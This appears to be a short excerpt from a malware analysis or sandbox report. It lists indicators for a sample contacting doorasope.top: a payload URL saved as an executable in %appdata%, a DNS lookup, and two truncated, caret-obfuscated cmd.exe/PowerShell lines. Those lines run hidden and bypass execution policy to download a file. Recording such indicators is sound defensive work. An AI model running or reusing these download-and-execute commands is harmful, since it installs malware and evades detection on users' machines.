Technical Information
- http://www.doorasope.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWe^r^sHell.Ex^e -ex^ecuTi^OnPOLIC^y ^B^yp^a^SS^ -NOpRo^f^IlE^ -w^Ind^ow^sTY^lE^ ^HIdd^EN (^N^ew-^oBj^EcT ^s^yST^E^M.NEt.web^c^lIEnt)^.^Do^wnLoa^dFile^('http://www.doorasope....
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "P^OWe^r^sHell.Ex^e -ex^ecuTi^OnPOLIC^y ^B^yp^a^SS^ -NOpRo^f^IlE^ -w^Ind^ow^sTY^lE^ ^HIdd^EN (^N^ew-^oBj^EcT ^s^yST^E^M.NEt.web^c^lIEnt)^.^Do^wnLoa^dFile^('http://www.doorasope....' (with hidden window)